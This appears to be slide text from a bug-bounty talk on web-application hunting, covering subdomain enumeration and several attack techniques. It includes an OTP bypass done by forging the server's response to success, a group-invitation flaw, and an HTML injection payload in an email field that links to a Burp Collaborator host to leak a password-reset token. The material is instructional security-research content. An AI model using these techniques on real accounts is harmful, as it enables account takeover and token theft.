Web Application Hunting Approach
Whoami�?�Name : Souvik Roy�CEH Certified
Full Time: Student /Learner
Part Time: Bug-Hunter
Outline
Finding & Choosing Targets
Bounty Rewards Response Time
Enumeration
- Certificate Transparency(CT) project
- ASN Number enum
- Enumeration using Tools
Tools
CT Project
ASN
Duplicates & Dead S-domains
Httpx & sort –u | uniq
Unique & Alive S-domains
It is better to write a script that will automate all the enumeration - fetch all subdomain using tools
- fetch all subdomain from CT project
- fetch all ASN number and subdomains
- filter-out all the dups and alive s-domains
project sonar that gather Internet wide scan data and make it available to researchers and the security community.
curl -silent https://scans.io/data/rapid7/sonar.fdns_v2/filename.json.gz | pigz -dc | grep “.domain.com” | jq
Scanning
Analyse
Attack
Bug Duplicate
h
no user found
user founded attacker
What operation does registration page do ?
1. Take input from user
2. Make sure that , email or username doesn't exist
3. Then it perform verification
4. It will perform INSERT operation
a. This web application provide feature to create groups.
b. The user who want to add member has to provide the username of the people to whom he/she wants to add .
c. It will send email to those username , and if user click on that link , he/she will be added to that .
I was able to add my account to any of the existing groups
a. This web application verify user using OTP.
b. The OTP is send in a phone number.
c. Put the wrong OTP and intercept the response
d. Edit the response and make it {“success”:true} & Forward it
email=victimsmail@yahoo.com|"/><a href="http://mc29f04J4p0qlm.burpcollaborator.net?do=sendToken
<a href="http://mc29f0dp4apo1hcbk2xvzm5dt2. burpcollaborator.net?do=sendToken&token=A5Dds4JERBbh sd0511...> Click Here </a>